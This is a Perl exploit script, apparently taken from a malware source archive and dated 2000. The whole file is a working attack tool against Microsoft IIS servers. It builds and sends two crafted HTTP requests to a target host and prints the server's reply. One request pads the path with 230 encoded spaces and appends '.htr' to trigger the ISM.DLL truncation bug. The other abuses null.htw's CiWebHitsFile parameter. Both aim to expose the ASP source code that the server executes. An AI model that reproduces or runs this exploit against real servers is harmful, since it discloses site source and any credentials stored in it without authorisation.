MalwareSourceCode/Perl/HackTool.Perl.Aspviewer
2020-10-09 21:59:39 -05:00

86 lines
2.4 KiB
Plaintext

#----------------------------------------------------------------#
# [ISMyASP] #
# IIS ASP source code viewer using ISM.DLL buffer truncation bug #
# and null.htw bug #
# LoWNOISE Colombia 5/2000 #
# Efrain 'ET' Torres et@cyberspace.org #
#----------------------------------------------------------------#
# Shoutz 2 f4lc0n & M43ztr0 <-- a gnu memb. #
#----------------------------------------------------------------#
# Some f() from wwwboard.pl by S.Sparling #
#----------------------------------------------------------------#
use Socket;
$port=80;
if (!($ARGV[0])) {
print "\n[ISMyASP]\n";
print "$0 http://host/view.asp \n";
print "ET LoWNOISE Colombia.\n";
exit;
}
$url=$ARGV[0];
chop($url) if $url =~ /\n$/;
print "url: $url\n";
$remote = $url;
$remote =~ s/http\:\/\///g;
$remote =~ s/\/([^>]|\n)*//g;
print "host: $remote\n";
$path = $url;
$path =~ s/http\:\/\///g;
$path =~ s/$remote//g;
print "path: $path\n";
$spaces=230; #THIS IS THE DEFAULT VALUE FOR ISM.DLL b.t
#REMEMBER THIS ATTACK ONLY WORKS ONLY 1 TIME
#READ THE CERBERUS CISADV000327.
$submit = "GET $path";
$i=0;
while($i < $spaces)
{
$submit= "$submit%20";
$i++;
}
$submit= "$submit.htr HTTP/1.0\n\n";
print "======Trying ism.dll buffer truncation...\n";
print "submit: $submit\n\n";
&post_message;
print "======Trying null.htw...\n";
$submit="GET /null.htw?CiWebHitsFile=$path%20&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n";
print "submit: $submit\n\n";
&post_message;
sub post_message
{
if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
die("No port specified.") unless $port;
$iaddr = inet_aton($remote) || die("Failed to find host: $remote");
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
connect(SOCK, $paddr) || die("Unable to connect: $!");
send(SOCK,$submit,0);
printf "\n======Waiting for reply [pray]....\n\n";
while(<SOCK>) {
print $_;
}
close(SOCK);
}
print "\n\n======THE END. [LoWNOISE]\n";
exit;
#:) narco.guerrilla&gov.sucks.co (huge :x to PO-K)